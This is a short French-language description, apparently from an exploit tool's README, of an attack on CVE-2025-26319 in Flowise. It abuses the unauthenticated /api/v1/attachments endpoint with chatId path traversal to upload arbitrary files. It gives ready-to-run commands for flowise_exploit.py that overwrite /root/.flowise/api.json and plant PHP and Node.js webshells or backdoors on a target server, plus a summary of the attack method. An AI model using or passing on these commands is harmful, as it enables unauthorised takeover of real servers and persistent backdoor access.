
Exploit for CVE-2025-26319 ciblant le point de terminaison /api/v1/attachments de Flowise, permettant le téléchargement de fichier arbitraire non authentifié et la génération de webshell via path traversal.
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Génération et téléchargement automatiques d'une webshell
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
Principe d'attaque Utiliser la route /api/v1/attachments qui est dans la liste blanche, sans nécessiter d'authentification Manipuler le paramètre chatId pour effectuer un path traversal (../../../) Télécharger un fichier arbitraire à n'importe quel endroit du système de fichiers du serveur